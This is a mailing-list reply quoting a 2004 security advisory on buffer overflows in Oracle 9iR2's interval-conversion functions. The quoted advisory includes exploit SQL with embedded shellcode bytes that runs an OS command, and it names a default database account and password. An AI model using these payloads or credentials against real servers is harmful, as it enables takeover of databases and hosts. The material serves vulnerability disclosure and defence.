Hey Cesar. These are known bugs.
We (NGS) found and reported them last year. As you say, Oracle has already fixed them and released a patch. Check out http://www.nextgenss.com/research.html ...where we posted advisories on these bugs in December, along with another couple in from_tz and time_zone. We've historically found a lot of issues in Oracle, so if you want to eliminate the stuff that's already fixed from your list of 60+ issues it's a good place to look; the fine detail isn't always available in the Oracle alerts. -chris. On Thu, 5 Feb 2004, Cesar wrote: > Security Advisory > > Name: Oracle Database 9ir2 Interval Conversion > Functions Buffer Overflow. > System Affected : Oracle Database 9ir2, previous > versions could be affected too. > Severity : High > Remote exploitable : Yes > Author: Cesar Cerrudo. > Date: 02/05/04 > Advisory Number: CC020401 > > > Legal Notice: > > This Advisory is Copyright (c) 2003 Cesar Cerrudo. > You may distribute it unmodified and for free. You may > NOT modify it and distribute it or distribute > parts of it without the author's written permission. > You may NOT use it for commercial intentions > (this means include it in vulnerabilities databases, > vulnerabilities scanners, any paid service, > etc.) without the author's written permission. You are > free to use Oracle details for commercial intentions. > > > Disclaimer: > > The information in this advisory is believed to be > true though it may be false. > The opinions expressed in this advisory are my own and > not of any company. The usual standard > disclaimer applies, especially the fact that Cesar > Cerrudo is not liable for any damages caused > by direct or indirect use of the information or > functionality provided by this advisory. > Cesar Cerrudo bears no responsibility for content or > misuse of this advisory or any derivatives thereof. > > > > !!!!!!!!!!!ALERT!!!!!!!!!!!: > > Oracle was contacted about these vulnerabilities, but > their Security Response Team is one of the worst that > i have deal with, they don't care about security and > they don't even follow OISafety rules(Oracle is a > member). > Because this reason we only have told to Oracle about > just a couple of bugs, i think i won't contact them > anymore, > or maybe if i get a letter from Larry Ellison asking > for apologies...:). > Anyways if Oracle would spend more money on security > than in marketing saying that their products are > unbreakable > everything would be different. Right now Oracle > database server and other Oracle products are some > kind of backdoor. > These vulnerabilities are just only a bit of +60 that > we have identified (yes more than 60 issues and > most of these issues can be exploited by any low > privileged user to take complete control over the > database and probably OS, also for some of them there > aren't any workarounds). If you are running Oracle i > recomend you to start praying to not being hacked and > to start complaining to Oracle to improve the quality > of > their products and to release patches. > > BTW: if someone from Oracle dares to say that i'm not > telling the true, then probably i will release all the > holes > information to shut their mouths. > > Some workaround to protect your Oracle servers until > maybe next year when Oracle probably could fix their > buggy > database server: > > -Check packages permissions and remove public > permission, set minimal permissions > that fit your needs. > -Check Directory Objects permissions and remove public > permission, set minimal permissions > that fit your need, remove Directory Objecs if not > used. > -Restrict users to execute directly PL/SQL statements > over the server. > -Periodically audit users permissions on all database > objects. > -Lock users that aren't used. > -Change default passwords. > If you want automation, i really like AppDetective for > Oracle: > http://www.appsecinc.com/products/appdetective/oracle/ > > > Overview: > > Oracle Database Server is one of the most used > database servers in the world, it was marketed > as being unbreakable and many people thinks that is > one of the most secure database server in > the market. Larry Ellison (Oracle CEO) says that > Oracle is used by NSA, CIA, russian intelligence, > goverments, etc. > (www.commonwealthclub.org/archive/96/96-03ellison-qa.html), > so it must be really secure!!! > Oracle Database Server provides two functions that can > be used with PL/SQL to convert numbers > to date/time intervals, these functions have buffer > overflow vulnerebilities. > > > > Details: > > When any of these conversion funcions are called with > a long string as a second > parameter a buffer overflow occurs. > > To reproduce the overflow execute the next PL/SQL: > > SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual; > > SELECT NUMTODSINTERVAL(1,'longstringhere') from dual; > > > > This vulnerability can be exploited by any Oracle > Database user because access to these > functions can't be restricted. > Explotation of this vulnerability allow an attacker to > execute arbitrary code, also it > can be exploited to cause DOS (Denial of service) > killing Oracle server process. An attacker can > complete compromise the OS and database if Oracle is > running on Windows plataform, because Oracle must > run under the local System account or under an > administrative account. If Oracle is running on *nix > then only the database could be compromised because > Oracle runs mostly under oracle user which has > restricted > permissions. > Important!: Explotation of these vulnerabilities > becomes easy if Oracle Internet Directory has > been deployed, because Oracle Internet Directory > creates a database user called ODSCOMMON that > has a default password ODSCOMMON (Unbreakable???, > hahaha, please take a look at this > > http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html), > this password can not be changed, > so any attacker can use this user to connect to > database and exploit these vunerabilities. > > > Full tests on Oracle database 9ir2 under Microsoft > Windows 2000 Server and Linux confirm these > vulnerabilities, > versions running in other OS plataforms are believed > to be affected too. > Previous Oracle Database Server versions could be > affected by these vulnerabilities. > > > > Exploits: > > --these exploits should work on W2K Server and WinXp, > not tested on Win2003. > --run any command at the end of the string > SELECT > NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > || > > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 > > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo > ARE YOU SURE? >c:\Unbreakable.txt') > > FROM DUAL; > > SELECT > NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR' > || > > chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1 > > 48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo > ARE YOU SURE? >c:\Unbreakable.txt') > > FROM DUAL; > > > > Vendor Fix: > > Go to Oracle Metalink site, http://metalink.oracle.com > > > Vendor Contact: > > Oracle was contacted and they released a fix without > telling me nor the public anything and without issuing > an alert. > > > > > __________________________________ > Do you Yahoo!? > Yahoo! Finance: Get your refund fast by filing online. > http://taxes.yahoo.com/filing.html > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
